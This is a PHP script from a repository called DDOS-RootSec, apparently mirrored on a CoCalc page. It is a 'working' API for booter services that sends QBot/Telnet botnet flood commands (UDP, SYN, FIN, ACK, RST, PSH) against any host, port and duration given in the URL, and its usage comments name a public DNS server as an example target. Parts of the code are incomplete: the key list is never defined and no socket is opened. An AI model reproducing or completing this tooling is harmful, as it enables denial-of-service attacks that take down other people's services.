Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/API/QBOT.php
5038 views
1
// WORKING TELNET/QBOT BOTNET API FOR BOOTERS.
2
3
<?php
4
5
$attackMethods = array("UDP", "SYN", "FIN", "ACK", "RST", "PSH");
6
function htmlsc($string)
7
{
8
return htmlspecialchars($string, ENT_QUOTES, "UTF-8");
9
}
10
if (!isset($_GET["key"]) || !isset($_GET["host"]) || !isset($_GET["port"]) || !isset($_GET["method"]) || !isset($_GET["time"]))
11
die("<p>You are missing a parameter");
12
$key = htmlsc($_GET["key"]);
13
$host = htmlsc($_GET["host"]);
14
$port = htmlsc($_GET["port"]);
15
$method = htmlsc(strtoupper($_GET["method"]));
16
$time = htmlsc($_GET["time"]);
17
$command = "";
18
if (!in_array($key, $APIKeys)) die("Invalid API key");
19
if (!in_array($method, $attackMethods)) die("Invalid attack method");
20
if ($method == "UDP") $command = "!* UDP $host $port $time 32 1337 1\n";
21
else if ($method == "SYN") $command = "!* TCP $host $port $time 32 syn 10 1\n";
22
else if ($method == "FIN") $command = "!* TCP $host $port $time 32 fin 10 1\n";
23
else if ($method == "ACK") $command = "!* TCP $host $port $time 32 ack 10 1\n";
24
else if ($method == "RST") $command = "!* TCP $host $port $time 32 rst 10 1\n";
25
else if ($method == "PSH") $command = "!* TCP $host $port $time 32 psh 10 1\n";
26
27
($socket ? null : die("<p>Failed to connect"));
28
29
30
fwrite($socket, $command . "\n");
31
fclose($socket);
32
echo "Attack sent to $host:$port for $time seconds using method $method!\n";
33
?>
34
35
//API: 1.1.1.1/x.php?key=YOURFUCKINGKEY&host=[host]&port=[port]&method=[method]&time=[time]
36
//exp: 1.1.1.1/x.php?key=YOURFUCKINGKEY&host=8.8.8.8&port=80&method=udp&time=100
37